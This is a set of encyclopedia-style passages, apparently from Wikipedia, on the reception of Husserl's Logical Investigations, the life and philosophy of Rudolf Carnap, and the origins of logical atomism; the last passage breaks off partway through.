The Logical Investigations influenced the philosopher Martin Heidegger . [ 13 ] Heidegger studied them while a student at the Collegium Borromaeum, a theological seminary in Freiburg, where they were so rarely requested from the university library that he was easily able to renew them. [ 14 ] Heidegger was disappointed to find that they did not help to clarify the multiple meanings of being , but was nevertheless impressed by them and convinced to study philosophy as a result of reading them. [ 15 ] Heidegger believed that the second volume marked an apparent revival of psychologism, which puzzled him. [ 16 ] In Being and Time (1927), Heidegger credited the Logical Investigations with making the work possible, [ 17 ] and noted their influence on the philosopher Emil Lask. Heidegger credited Lask with being the only person who had taken up Husserl's investigations "from outside the main stream of phenomenological research". Heidegger pointed to Lask's Die Logik der Philosophie und die Kategorienlehre (1911) and Die Lehre vom Urteil (1912). [ 18 ]
The book influenced the philosopher Jean-Paul Sartre , who drew on its ideas in works such as The Transcendence of the Ego (1936) and Being and Nothingness (1943). [ 19 ] The work also influenced the sociologist Talcott Parsons ' The Structure of Social Action (1937), and the Prague linguistic circle , thereby helping to establish the form of structuralism represented by the French anthropologist Claude Lévi-Strauss . [ 20 ] The work influenced the linguist Roman Jakobson , [ 21 ] and helped shape the development of Waldemar Conrad's work on aesthetics and the philosopher Gustav Shpet 's work on both aesthetics and the philosophy of language . [ 22 ] It also influenced the philosopher Ernst Tugendhat 's work Vorlesungen zur Einführung in die sprachanalytische Philosophie (1976). [ 23 ] The Logical Investigations have been compared to the philosophy of mathematics of the Nicolas Bourbaki group. Though they did not influence the structural linguistics of Louis Hjelmslev and Noam Chomsky , their theories have nevertheless been compared to Husserl's inquiries. [ 21 ] It has also been suggested that the Logical Investigations dealt with questions concerning the role of language similar to those discussed in the theologian Saint Augustine 's Confessions . [ 24 ]
Discussions of the work in the European Journal of Philosophy include those by Gianfranco Soldati, [ 23 ] Irene McMullin, [ 25 ] and Lambert Zuidervaart. [ 26 ]
Soldati criticized the laws Husserl formulated concerning "the relations between dependent and independent parts of a whole", finding them "incomplete and not always easy to grasp." He also noted that some commentators have seen Husserl as maintaining that formal ontology is independent of formal logic, while others believe that for Husserl, formal ontology belongs to formal logic. [ 23 ] Mcmullin argued that while in the Logical Investigations , Husserl's discussion of "expression" was focused exclusively on its linguistic meaning, he developed a significantly expanded notion of expression in his later work. [ 25 ]
Zuidervaart wrote that the Logical Investigations have been variously interpreted by Anglo-American commentators, being seen as idealist by the philosopher Louis Dupré and realist by the philosopher Dallas Willard , while others argue Husserl moved from realism to idealism. He added that there has been dispute over whether Husserl has "an epistemic conception of propositional truth" according to which propositional truth "depends on discursive justification to some significant degree". He concluded that Husserl suggests an alternative to "the epistemic/nonepistemic polarity in contemporary truth theory" and "a way to resituate propositional truth within a broader and more dynamic conception of truth". [ 26 ]
Discussions of the work in Human Studies include those by Mark Katherine Tillman and Keiichi Noé. [ 27 ] [ 28 ]
Tillman maintained that the "descriptive psychology of prepredicative thought" Husserl expounded in the Logical Investigations had been anticipated by both Dilthey and the theologian John Henry Newman , despite the fact that Newman, unlike Dilthey, never used the term. [ 27 ] Noé argued that Husserl modified his views after the publication of the Logical Investigations , expressing a different perspective in his posthumous work The Origin of Geometry . He characterized these changes as "the Hermeneutic Tum" in the Husserlian phenomenology of language, suggesting that it was caused by "a change of attitude toward the constitutive function of language". He described Husserl's later view of language as "dialogical", in contrast to the "monological" view of the Logical Investigations . [ 28 ]
Discussions of the work in Inquiry include those by Wayne M. Martin and Lilian Alweiss. [ 29 ] [ 30 ]
Martin defended Husserl against Dummett's argument that his attempt to extend an analysis of the structure of meaningful expressions into an account of the structure of meaning in experience is a form of psychologism and idealism. He attributed to Husserl the view that, "meanings are mind-independent structures that are also structures of consciousness", finding it controversial but defensible. He maintained that Husserl's later views on noemata were not a renunciation but a further development of those in the Logical Investigations , even though Husserl introduced the term "noema" only in Ideas . [ 29 ] Alweiss argued that, contrary to a consensus among analytic philosophers, examination of the Logical Investigations shows that Husserl was not a "methodological solipsist". However, she considered it open to debate whether Husserl adopted a position of " internalism ". [ 30 ]
Discussions of the work in Studia Phaenomenologica include those by Peter Andras Varga and Bernardo Ainbinder. [ 31 ] [ 32 ]
Varga discussed the philosopher Leonard Nelson 's criticism of Husserl's arguments against psychologism in the Logical Investigations in Über das sogennante Erkenntnisproblem (1908), noting that Nelson charged Husserl with "mistaking deduction for proof" and thereby falsely assuming that a psychological foundation of logic would inevitably lead to a vicious circle. He argued that Nelson misunderstood and oversimplified Husserl's views and that his arguments against Husserl were flawed. He also noted that despite his criticism of Husserl, Nelson recognized some similarity between their views, suggesting that he made "a very fruitful comparison between his and Husserl’s enterprise". He suggested that Husserl also misunderstood Nelson, and that his phenomenology could benefit from Nelson's " presentation of the framework of the problem of the foundation ." [ 31 ]
Criticizing the view that Lask's interest in the work represented his departure from neo-Kantianism, Ainbinder argued that Lask found insights in it that could contribute to making sense of the "Kantian transcendental project" through a "proper understanding of the Copernican Turn in objectivistic terms"; according to Ainbinder, these included the "secondary place of judgment in the constitution of the categorial" and "the idea of a formal ontology". Ainbinder further argued that the work could be seen, despite Husserl's view of it, as "a proper work of transcendental philosophy", noting that Lask, like Heidegger, believed that Husserl overlooked its "key tools for transcendental thought", and as a result was led into "subjectivistic idealism". He added that Lask beliefs about how its approach needed to be complemented anticipated Husserl's later work. [ 32 ]
Other discussions of the Logical Investigations in academic journals include those by Dieter Münch in the Journal of the British Society for Phenomenology , [ 33 ] the philosopher Dallas Willard in The Review of Metaphysics , [ 34 ] Juan Jesús Borobia in Tópicos. Revista de Filosofía , [ 35 ] John Scanlon in the Journal of Phenomenological Psychology , [ 36 ] John J. Drummond in the International Journal of Philosophical Studies , [ 37 ] Victor Biceaga in the Journal of the History of the Behavioral Sciences , [ 38 ] Richard Tieszen in Philosophia Mathematica , [ 39 ] Mariano Crespo in Revista de Filosofía , [ 40 ] Juan Sebastián Ballén Rodríguez in Universitas Philosophica , [ 41 ] Witold Płotka in Coactivity / Santalka , [ 42 ] Manuel Gustavo Isaac in History & Philosophy of Logic , [ 43 ] Mikhail A. Belousov in Russian Studies in Philosophy , [ 44 ] Victor Madalosso and Yuri José in Intuitio , [ 45 ] Findlay in The Philosophical Forum , [ 46 ] and Andrea Marchesi in Grazer Philosophische Studien . [ 47 ] Sávio Passafaro Peres has discussed the work in Estudos e Pesquisas em Psicologia and Psicologia USP . [ 48 ] [ 49 ]
Münch described the Logical Investigations as a "highly theoretical book", finding it similar in this respect to the Critique of Pure Reason . He maintained that Husserl's development of a theory of "symbolic knowledge" in the Logical Investigations showed that such a theory had been a significant problem for the early Husserl. He also argued that Husserl put forward a theory of truth in the work that represented a departure from that of his early writings, and that Husserl anticipated both aspects of artificial intelligence and criticisms of artificial intelligence made by philosophers such as John Searle and Hubert Dreyfus . He rejected the view that the Logical Investigations can be understood only from the perspective of Husserl's later work, in which he developed transcendental phenomenology. [ 33 ]
Scanlon noted that Husserl visited Dilthey in 1905, after hearing favorable comments on his seminar on the Logical Investigations , and that Dilthey had publicly stated that the book was "epoch-making in the use of description for the theory of knowledge." According to Scanlon, although Husserl's critique of psychologism was widely considered devastating, he caused confusion by using the terms "phenomenology" and "descriptive psychology" interchangeably, leading some to conclude that he was presenting a new version of psychologism. He suggested that this may have embarrassed Husserl, who later explained that phenomenology could be described as "descriptive psychology" only in a properly qualified sense; he also argued that, despite some similarities, Husserl's views as expressed in the Logical Investigations were in other respects radically different from Dilthey's. He wrote that by 1925 Husserl had developed a more satisfying perspective on the issues discussed in the work, including recognition that numbers are formed actively in counting and propositions in judging, the "kernel of truth in psychologism". He credited Husserl with introducing a "rich and insightful approach to psychic life" in the Logical Investigations . [ 36 ]
Drummond maintained that Husserl's theory of "pure logical grammar" occupied an intermediary position between his earlier and more mature theories of meaning, and that later parts of the Logical Investigations indicated that the theory of meaning in earlier parts of the work required correction. He added that Husserl indicated, in the second edition of the work, that it required extensive revision. According to Drummond, Husserl wrote a partial and preliminary revision, including "a new distinction between signitive and significative intentions", and "the claim that all meaning-conferring acts, including nominal acts, and all meaning-fulfilling acts, including those fulfilling nominal acts, are categorially formed." He argued that the first edition of the work suffered from Husserl's "early conception of phenomenology as descriptive psychology", which resulted in "a misconception
of the proper object of philosophical reflection" and a flawed account of expressive acts, and that Husserl used arguments that left him vulnerable to the charge that his views were a form of psychologism. However, he added that, in works such as Ideas , Husserl reformulated "the distinction between phenomenological and intentional contents" and developed an improved understanding of "the proper object of philosophical reflection". This change of view was also expressed in the second edition of the Logical Investigations . [ 37 ]
Płotka argued that Husserl's program of objective investigation could be reformulated in a way that made it possible to understand phenomenology as "therapeutic science", involving "the methodological movement of the possibility for communal formulation of transcendental investigation." [ 42 ]
Belousov questioned the details of Husserl's understanding of intentionality, noting that Husserl came to different conclusions in later works such as Ideas . [ 44 ] Madalosso and José argued that the book contained "various conceptual and terminological problems", including that of how "a psychic act, ideal meaning and real object achieves to establish a correspondence relation". [ 45 ]
Findlay argued that in Ideas , Husserl attempted to disguise changes that had occurred in his opinions by attributing his views as of 1913 to the earlier Logical Investigations . [ 46 ] Marchesi argued that while it is widely accepted that "Husserl developed his most sophisticated theory of intentionality" in the Logical Investigations , it had incorrectly been interpreted as non-relational by most commentators. He maintained that a phenomenological theory of intentionality based on Husserl's insights cannot be non-relational. [ 47 ]
In Estudos e Pesquisas em Psicologia , Peres observed that Husserl's phenomenology was "received as a form of descriptive psychology" that aimed at "conceptual preparation for the development of an empirical psychology." [ 48 ] In Psicologia USP , he argued that Husserl understood phenomenology as a "peculiar form of descriptive psychology". He contrasted it with the classical empiricism of the 16th and 17th centuries and Kant's transcendental idealism . [ 49 ]
The philosopher Jacques Derrida , who studied the Logical Investigations as a student in the 1950s, [ 50 ] offered a critique of Husserl's work in Speech and Phenomena (1967). [ 51 ] Adorno maintained that the second volume of the Logical Investigations was "ambiguous". [ 52 ] The philosopher Karl Popper commented that the Logical Investigations started a "vogue" for "anti-psychologism". He attributed Husserl's opposition to psychologism to the philosopher Gottlob Frege's criticism of the Philosophy of Arithmetic . He believed that Husserl, in his discussion of science, proposed distinctions similar to Popper's three worlds . However, he suggested that Husserl had written in a way that had caused confusion about his views. He also criticized Husserl's view that a scientific theory is an hypothesis that has been proven correct. [ 53 ] The philosopher Paul Ricœur credited Husserl, along with Frege, with helping to establish the dichotomy "between Sinn or sense and Vorstellung or representation". [ 54 ] Helmut R. Wagner described the Logical Investigations as Husserl's first major work. [ 55 ] The philosopher Roger Scruton has criticized the Logical Investigations for their obscurity; [ 56 ] however, he has also described them as being of "great interest", and noted that, alongside Ideas for a Pure Phenomenology (1913) and Cartesian Meditations (1929), they were among the writings by Husserl that had attracted the most attention. [ 57 ]
The philosophers Barry Smith and David Woodruff Smith described the Logical Investigations as Husserl's magnum opus . They credited Husserl with providing a "devastating" critique of psychologism, adding that it was more influential than similar critiques from other philosophers such as Frege and Bernard Bolzano , and brought to an end the period during which psychologism was most influential. They noted that following the publication of the Logical Investigations , Husserl's interests shifted from logic and ontology to transcendental idealism and the methodology of phenomenology. According to Smith and Smith, Husserl's initial influence began at the University of Munich , where Johannes Daubert, who read the Logical Investigations in 1902, persuaded a group of students to accept the work and reject the views of their teacher Theodor Lipps . [ 58 ] The philosopher Judith Butler compared the Logical Investigations to the early work of the philosopher Ludwig Wittgenstein . [ 59 ]
Donn Welton stated that in the Logical Investigations , Husserl introduced a novel conception of the relationships between language and experience, meaning and reference, and subject and object, and by his work on theories dealing with meaning, truth, the subject, and the object, helped create phenomenology, a new form of philosophy that went beyond psychologism, formalism , realism , idealism , objectivism and subjectivism , and made twentieth century continental philosophy possible. [ 60 ] Moran wrote that the Logical Investigations exerted an influence on 20th-century European philosophy comparable to that which Sigmund Freud 's The Interpretation of Dreams (1899) had exerted on psychoanalysis . [ 61 ] Powell described the analyses of signs and meaning in the Logical Investigations as "rigorous and abstract", "scrupulous", but also "tedious". [ 50 ]
The philosopher Ray Monk described the Logical Investigations as obscurely written, adding that the philosopher Bertrand Russell reported finding reading it difficult. [ 62 ] The philosopher Robert Sokolowski credited Husserl with providing a convincing critique of psychologism. However, he criticized the first edition of the Logical Investigations for sharply distinguishing between "the thing as given to us" and the thing-in-itself , a standpoint he considered comparable to Kant's. He noted that between 1900 and 1910, Husserl abandoned these Kantian distinctions. According to Sokolowski, when Husserl expressed a new philosophical position in Ideas , he was misinterpreted as adopting a traditional form of idealism and "many thinkers who admired Husserl's earlier work distanced themselves from what he now taught." [ 63 ]
Books
Journals
Online articles | https://en.wikipedia.org/wiki/Logical_Investigations_(Husserl) |
Rudolf Carnap ( / ˈ k ɑːr n æ p / ; [ 20 ] German: [ˈkaʁnaːp] ; 18 May 1891 – 14 September 1970) was a German-language philosopher who was active in Europe before 1935 and in the United States thereafter. He was a major member of the Vienna Circle and an advocate of logical positivism .
Carnap's father rose from being a poor ribbon-weaver to be the owner of a ribbon-making factory. His mother came from an academic family; her father was an educational reformer and her oldest brother was the archaeologist Wilhelm Dörpfeld . As a ten-year-old, Carnap accompanied Wilhelm Dörpfeld on an expedition to Greece. [ 21 ] Carnap was raised in a profoundly religious Protestant family, but later became an atheist. [ 22 ] [ 23 ]
He began his formal education at the Barmen Gymnasium and the Carolo-Alexandrinum [ de ] Gymnasium in Jena . [ 24 ] From 1910 to 1914, he attended the University of Jena , intending to write a thesis in physics . He also intently studied Immanuel Kant 's Critique of Pure Reason during a course taught by Bruno Bauch , and was one of the very few students to attend Gottlob Frege 's courses in mathematical logic .
During his university years, he became enthralled with the German Youth Movement . [ 1 ]
While Carnap held moral and political opposition to World War I , he felt obligated to serve in the German army. After three years of service, he was given permission to study physics at the University of Berlin , 1917–18, where Albert Einstein was a newly appointed professor. Carnap then attended the University of Jena , where he wrote a thesis defining an axiomatic theory of space and time . The physics department said it was too philosophical, and Bruno Bauch of the philosophy department said it was pure physics. Carnap then wrote another thesis in 1921, under Bauch's supervision, [ 2 ] on the theory of space in a more orthodox Kantian style, published as Der Raum ( Space ) in a supplemental issue of Kant-Studien (1922).
Frege's course exposed him to Bertrand Russell 's work on logic and philosophy, which gave a sense of direction to his studies. He accepted the effort to surpass traditional philosophy with logical innovations that inform the sciences. He wrote a letter to Russell, who responded by copying by hand long passages from his Principia Mathematica for Carnap's benefit, as neither Carnap nor his university could afford a copy of this epochal work. In 1924 and 1925, he attended seminars led by Edmund Husserl , [ 25 ] the founder of phenomenology , and continued to write on physics from a logical positivist perspective.
Carnap discovered a kindred spirit when he met Hans Reichenbach at a 1923 conference. Reichenbach introduced Carnap to Moritz Schlick , a professor at the University of Vienna who offered Carnap a position in his department, which Carnap accepted in 1926. Carnap thereupon joined an informal group of Viennese intellectuals that came to be known as the Vienna Circle , directed largely by Schlick and including Hans Hahn , Friedrich Waismann , Otto Neurath , and Herbert Feigl , with occasional visits by Hahn's student Kurt Gödel . When Wittgenstein visited Vienna, Carnap would meet with him. He (with Hahn and Neurath) wrote the 1929 manifesto of the Circle, and (with Hans Reichenbach ) initiated the philosophy journal Erkenntnis .
In February 1930, Alfred Tarski lectured in Vienna, and during November 1930, Carnap visited Warsaw. On these occasions, he learned much about Tarski's model-theoretic method of semantics . Rose Rand , another philosopher in the Vienna Circle, noted, "Carnap's conception of semantics starts from the basis given in Tarski's work, but a distinction is made between logical and non-logical constants, and between logical and factual truth... At the same time, he worked with the concepts of intension and extension , and took these two concepts as a basis of a new method of semantics." [ 26 ]
In 1931, Carnap was appointed Professor at the German University of Prague . In 1933, W. V. Quine met Carnap in Prague and discussed the latter's work at some length. Thus began the lifelong mutual respect these two men shared, one that survived Quine's eventual forceful disagreements with a number of Carnap's philosophical conclusions.
Carnap, whose socialist and pacifist beliefs put him at risk in Nazi Germany , emigrated to the United States in 1935 and became a naturalized citizen in 1941. Meanwhile, back in Vienna, Schlick was murdered in 1936. From 1936 to 1952, Carnap was a professor of philosophy at the University of Chicago . During the late 1930s, Carnap offered an assistant position in philosophy to Carl Gustav Hempel , who accepted and became one of his most significant intellectual collaborators. Thanks partly to Quine's help, Carnap spent the years 1939–41 at Harvard University , where he was reunited with Tarski. [ 27 ] Carnap (1963) later expressed some irritation about his time at Chicago, where he and Charles W. Morris were the only members of the department committed to the primacy of science and logic. (Their Chicago colleagues included Richard McKeon , Charles Hartshorne , and Manley Thompson.) Carnap's years at Chicago were nonetheless very productive ones. He wrote books on semantics (Carnap 1942, 1943, 1956), modal logic , and on the philosophical foundations of probability and inductive logic (Carnap 1950, 1952).
After a stint at the Institute for Advanced Study in Princeton (1952–1954), he joined the UCLA Department of Philosophy in 1954, Hans Reichenbach having died the previous year. He had earlier refused an offer of a similar job at the University of California, Berkeley , because accepting that position required that he sign a loyalty oath , a practice to which he was opposed on principle. While at UCLA, he wrote on scientific knowledge, the analytic–synthetic distinction , and the verification principle . His writings on thermodynamics and on the foundations of probability and inductive logic were published posthumously as Carnap (1971, 1977, 1980).
Carnap taught himself Esperanto when he was 14 years of age. He later attended the World Congress of Esperanto in Dresden in 1908. [ 28 ] He also attended the 1924 Congress in Vienna, where he met his fellow Esperantist Otto Neurath for the first time. [ 29 ]
In the USA, Carnap was somewhat politically involved. Carnap was a signatory of an open appeal distributed by the National Committee to Secure Justice in the Rosenberg Case to appeal for clemency in the case. [ 30 ] He was listed as a 'sponsor' for the "National Conference to Appeal the Walter-McCarran Law and Defend Its Victims" organised by the American Committee for the Protection of the Foreign Born , [ 31 ] and also for the "Scientific and Cultural Conference for World Peace" organised by the National Council of Arts, Sciences and Professions . [ 32 ]
Carnap had four children by his first marriage to Elizabeth Schöndube, which ended in divorce in 1929. He married his second wife, Elizabeth Ina Stöger, in 1933. [ 21 ] Ina committed suicide in 1964.
Below is an examination of the main topics in the evolution of the philosophy of Rudolf Carnap. It is not exhaustive, but it outlines Carnap's main works and contributions to modern epistemology and philosophy of logic .
From 1919 to 1921, Carnap worked on a doctoral thesis called Der Raum: Ein Beitrag zur Wissenschaftslehre ( Space: A Contribution to the Theory of Science , 1922). In this dissertation on the philosophical foundations of geometry , Carnap tried to provide a logical basis for a theory of space and time in physics . Considering that Carnap was interested in pure mathematics , natural sciences and philosophy, his dissertation can be seen as an attempt to build a bridge between the different disciplines that are geometry, physics, and philosophy. For Carnap thought that in many instances those disciplines use the same concepts, but with totally different meanings. The main objective of Carnap's dissertation was to show that the inconsistencies between theories concerning space only existed because philosophers, as well as mathematicians and scientists, were talking about different things while using the same "space" word. Hence, Carnap characteristically argued that there had to be three separate notions of space. "Formal" space is space in the sense of mathematics: it is an abstract system of relations. "Intuitive" space is made of certain contents of intuition independent of single experiences. "Physical" space is made of actual spatial facts given in experience. The upshot is that those three kinds of "space" imply three different kinds of knowledge and thus three different kinds of investigations. It is interesting to note that it is in this dissertation that the main themes of Carnap's philosophy appear, most importantly, the idea that many philosophical contradictions appear because of a misuse of language, and a stress on the importance of distinguishing formal and material modes of speech.
From 1922 to 1925, Carnap worked on a book which became one of his major works, namely Der logische Aufbau der Welt (translated as The Logical Structure of the World , 1967), which was accepted in 1926 as his habilitation thesis at the University of Vienna and published as a book in 1928. [ 33 ] That achievement has become a landmark in modern epistemology and can be read as a forceful statement of the philosophical thesis of logical positivism. Indeed, the Aufbau suggests that epistemology, based on modern symbolic logic , is concerned with the logical analysis of scientific propositions, while science itself, based on experience, is the only source of knowledge of the external world, i.e. the world outside the realm of human perception. According to Carnap, philosophical propositions are statements about the language of science; they aren't true or false, but merely consist of definitions and conventions about the use of certain concepts. In contrast, scientific propositions are factual statements about the external reality. They are meaningful because they are based on the perceptions of the senses. In other words, the truth or falsity of those propositions can be verified by testing their content with further observations.
In the Aufbau , Carnap wants to display the logical and conceptual structure with which all scientific (factual) statements can be organized. Carnap gives the label " constitution theory " to this epistemic-logical project. It is a constructive undertaking that systematizes scientific knowledge according to the notions of symbolic logic. Accordingly, the purpose of this constitutional system is to identify and discern different classes of scientific concepts and to specify the logical relations that link them. In the Aufbau, concepts are taken to denote objects, relations, properties, classes and states. Carnap argues that all concepts must be ranked over a hierarchy. In that hierarchy, all concepts are organized according to a fundamental arrangement where concepts can be reduced and converted to other basic ones. Carnap explains that a concept can be reduced to another when all sentences containing the first concept can be transformed into sentences containing the other. In other words, every scientific sentence should be translatable into another sentence such that the original terms have the same reference as the translated terms. Most significantly, Carnap argues that the basis of this system is psychological. Its content is the "immediately given", which is made of basic elements, namely perceptual experiences. These basic elements consist of conscious psychological states of a single human subject. In the end, Carnap argues that his constitutional project demonstrates the possibility of defining and uniting all scientific concepts in a single conceptual system on the basis of a few fundamental concepts.
From 1928 to 1934, Carnap published papers ( Scheinprobleme in der Philosophie , 1928; translated as Pseudoproblems in Philosophy , 1967) in which he appears overtly skeptical of the aims and methods of metaphysics , i.e. the traditional philosophy that finds its roots in mythical and religious thought. Indeed, he discusses how, in many cases, metaphysics is made of meaningless discussions of pseudo-problems. For Carnap, a pseudo-problem is a philosophical question that, on the surface, handles concepts that refer to our world while, in fact, these concepts do not actually denote real and attested objects. In other words, these pseudo-problems concern statements that do not, in any way, have empirical implications. They do not refer to states of affairs and the things they denote cannot be perceived. Consequently, one of Carnap's main aim has been to redefine the purpose and method of philosophy. According to him, philosophy should not aim at producing any knowledge transcending the knowledge of science. In contrast, by analyzing the language and propositions of science, philosophers should define the logical foundations of scientific knowledge. Using symbolic logic , they should explicate the concepts, methods, and justificatory processes that exist in science.
Carnap believed that the difficulty with traditional philosophy lay in the use of concepts that are not useful for science. For Carnap, the scientific legitimacy of these concepts was doubtful because the sentences containing them do not express facts. Indeed, a logical analysis of those sentences proves that they do not convey the meaning of states of affairs. In other words, these sentences are meaningless. Carnap explains that to be meaningful, a sentence should be factual. It can be so, for one thing, by being based on experience, i.e., by being formulated with words relating to direct observations. For another, a sentence is factual if one can clearly state what the observations are that could confirm or disconfirm that sentence. After all, Carnap presupposes a specific criterion of meaning, namely the Wittgensteinian principle of verifiability. Indeed, he requires, as a precondition of meaningfulness, that all sentences be verifiable, which implies that a sentence is meaningful only if there is a way to verify if it is true or false. To verify a sentence, one needs to expound the empirical conditions and circumstances that would establish the truth of the sentence. As a result, it is clear for Carnap that metaphysical sentences are meaningless. They include concepts like "god", "soul", and "the absolute" that transcend experience and cannot be traced back or connected to direct observations. Because those sentences cannot be verified in any way, Carnap suggests that science, as well as philosophy, should neither consider nor contain them.
At that point in his career, Carnap attempted to develop a full theory of the logical structure of scientific language. This theory, exposed in Logische Syntax der Sprache (1934; translated as The Logical Syntax of Language , 1937) gives the foundations to his idea that scientific language has a specific formal structure and that its signs are governed by the rules of deductive logic. Moreover, the theory of logical syntax expounds a method with which one can talk about a language: it is a formal meta-theory about the pure forms of language. In the end, because Carnap argues that philosophy aims at the logical analysis of the language of science and thus is the logic of science, the theory of the logical syntax can be considered as a definite language and a conceptual framework for philosophy.
The logical syntax of language is a formal theory. It is not concerned with the contextualized meaning or the truth-value of sentences. In contrast, it considers the general structure of a given language and explores the different structural relations that connect the elements of that language. Hence, by explaining the different operations that allow specific transformations within the language, the theory is a systematic exposition of the rules that operate within that language. In fact, the basic function of these rules is to provide the principles to safeguard coherence, to avoid contradictions, and to deduce justified conclusions. Carnap sees language as a calculus. This calculus is a systematic arrangement of symbols and relations. The symbols of the language are organized according to the class that they belong to—and it is through their combination that we can form sentences. The relations are different conditions under which a sentence can be said to follow, or to be the consequence, of another sentence. The definitions included in the calculus state the conditions under which a sentence can be considered of a certain type and how those sentences can be transformed. We can see the logical syntax as a method of formal transformation, i.e., a method for calculating and reasoning with symbols.
Finally, Carnap introduces his well-known "principle of tolerance." This principle suggests that there is no moral in logic. When it comes to using a language, there is no good or bad, fundamentally true or false. In this perspective, the philosopher's task is not to bring authoritative interdicts prohibiting the use of certain concepts. In contrast, philosophers should seek general agreements over the relevance of certain logical devices. According to Carnap, those agreements are possible only through the detailed presentation of the meaning and use of the expressions of a language. In other words, Carnap believes that every logical language is correct only if this language is supported by exact definitions and not by philosophical presumptions. Carnap embraces a formal conventionalism. That implies that formal languages are constructed and that everyone is free to choose the language they find more suited to their purpose. There should not be any controversy over which language is the correct language; what matters is agreeing over which language best suits a particular purpose. Carnap explains that the choice of a language should be guided according to the security it provides against logical inconsistency. Furthermore, practical elements like simplicity and fruitfulness in certain tasks influence the choice of a language. Clearly enough, the principle of tolerance was a sophisticated device introduced by Carnap to dismiss any form of dogmatism in philosophy.
After having considered problems in semantics, i.e. the theory of the concepts of meaning and truth ( Foundations of Logic and Mathematics , 1939; Introduction to Semantics , 1942; Formalization of Logic , 1943), Carnap turned his attention to the subject of probability and inductive logic . His views on that subject are, for the most part exposed in Logical foundations of probability (1950) where Carnap aims to give a sound logical interpretation of probability. Carnap thought that, according to certain conditions, the concept of probability had to be interpreted as a purely logical concept. In this view, probability is a basic concept anchored in all inductive inferences, whereby the conclusion of every inference that holds without deductive necessity is said to be more or less likely to be the case. In fact, Carnap claims that the problem of induction is a matter of finding a precise explanation of the logical relation that holds between a hypothesis and the evidence that supports it. An inductive logic is thus based on the idea that probability is a logical relation between two types of statements: the hypothesis (conclusion) and the premises (evidence). Accordingly, a theory of induction should explain how, by pure logical analysis, we can ascertain that certain evidence establishes a degree of confirmation strong enough to confirm a given hypothesis.
Carnap was convinced that there was a logical as well as an empirical dimension in science. He believed that one had to isolate the experiential elements from the logical elements of a given body of knowledge. Hence, the empirical concept of frequency used in statistics to describe the general features of certain phenomena can be distinguished from the analytical concepts of probability logic that merely describe logical relations between sentences. For Carnap, the statistical and the logical concepts must be investigated separately. Having insisted on this distinction, Carnap defines two concepts of probability. The first one is logical and deals with the degree to which a given hypothesis is confirmed by a piece of evidence. It is the degree of confirmation . The second is empirical and relates to the long-run rate of one observable feature of nature relative to another. It is the relative frequency. Statements belonging to the second concept are about reality and describe states of affairs. They are empirical and, therefore, must be based on experimental procedures and the observation of relevant facts. On the contrary, statements belonging to the first concept do not say anything about facts. Their meaning can be grasped solely with an analysis of the signs they contain. They are analytical sentences, i.e. true by virtue of their logical meaning. Even though these sentences could refer to states of affairs, their meaning is given by the symbols and relations they contain. In other words, the probability of a conclusion is given by the logical relation it has to the evidence. The evaluation of the degree of confirmation of a hypothesis is thus a problem of meaning analysis.
Clearly, the probability of a statement about relative frequency can be unknown because it depends on the observation of certain phenomena, and one may not possess the information needed to establish the value of that probability. Consequently, the value of that statement can be confirmed only if it is corroborated by facts. In contrast, the probability of a statement about the degree of confirmation could be unknown, in the sense that one may miss the correct logical method to evaluate its exact value. But, such a statement can always receive a certain logical value, given the fact that this value only depends on the meaning of its symbols.
The Rudolf Carnap Papers contain thousands of letters, notes and drafts, and diaries. The majority of his papers were purchased from his daughter, Hanna Carnap-Thost in 1974, by the University of Pittsburgh, with subsequent further accessions. Documents that contain financial, medical, and personal information are restricted. [ 34 ] These were written over his entire life and career. Carnap used the mail regularly to discuss philosophical problems with hundreds of others. The most notable were: Herbert Feigl, Carl Gustav Hempel, Felix Kaufmann, Otto Neurath, and Moritz Schlick. Photographs are also part of the collection and were taken throughout his life. Family pictures and photographs of his peers and colleagues are also stored in the collection. Some of the correspondence is considered notable and consist of his student notes, his seminars with Frege (describing the Begriffsschrift and the logic in mathematics). Carnap's notes from Russell's seminar in Chicago, and notes he took from discussions with Tarski, Heisenberg, Quine, Hempel, Gödel, and Jeffrey are also part of the University of Pittsburgh Library System's Archives and Special Collections. Digitized contents include:
Much material is written in an older German shorthand, the Stolze-Schrey system. He employed this writing system extensively beginning in his student days. [ 34 ] Some of the content has been digitized and is available through the finding aid . The University of California also maintains a collection of Rudolf Carnap Papers. Microfilm copies of his papers are maintained by the Philosophical Archives at the University of Konstanz in Germany. [ 36 ]
*For a more complete listing see Carnap’s Works in "Linked bibliography ". [ 44 ] | https://en.wikipedia.org/wiki/Logical_Syntax_of_Language |
Logical atomism is a philosophical view that originated in the early 20th century with the development of analytic philosophy . It holds that the world consists of ultimate logical "facts" (or "atoms") that cannot be broken down any further, each of which can be understood independently of other facts.
Its principal exponent was the British philosopher Bertrand Russell . It is also widely held that the early works [ a ] of his Austrian-born pupil and colleague, Ludwig Wittgenstein , defend a version of logical atomism, though he went on to reject it in his later Philosophical Investigations . [ b ] Some philosophers in the Vienna Circle were also influenced by logical atomism (particularly Rudolf Carnap , who was deeply sympathetic to some of its philosophical aims, especially in his earlier works). [ 2 ] Gustav Bergmann also developed a form of logical atomism that focused on an ideal phenomenalistic language, particularly in his discussions of J.O. Urmson 's work on analysis. [ 3 ]
The name for this kind of theory was coined in March 1911 by Russell, in a work published in French titled "Le Réalisme analytique" (published in translation as "Analytic Realism" in Volume 6 of The Collected Papers of Bertrand Russell ). [ 4 ] Russell was developing and responding to what he called " logical holism "—i.e., the belief that the world operates in such a way that no part can be known without the whole being known first. [ 5 ] This belief is related to monism , and is associated with the absolute idealism which was dominant in Britain at the time. The criticism of monism seen in the works of Russell and his colleague G. E. Moore can therefore be seen as an extension of their criticism of absolute idealism, particularly as it appeared in the works of F. H. Bradley and J. M. E. McTaggart . [ 5 ] Logical atomism can thus be understood as a developed alternative to logical holism, or the "monistic logic" of the absolute idealists.
As mentioned above, the term "logical atomism" was first coined by Russell in 1911. However, since the paper in which it was first introduced was published only in French during Russell's lifetime, the view was not widely associated with Russell in the English-speaking world until Russell gave a series of lectures in early 1918 under the title "The Philosophy of Logical Atomism". These lectures were subsequently published in 1918 and 1919 in The Monist (Volumes 28 and 29), which at the time was edited by Phillip Jourdain . [ 6 ] Russell's ideas as presented in 1918 were also influenced by Wittgenstein, as he explicitly acknowledges in his introductory note. This has partly contributed to the widely-held view that Wittgenstein was also a logical atomist, as has Wittgenstein's atomistic metaphysics developed in the Tractatus .
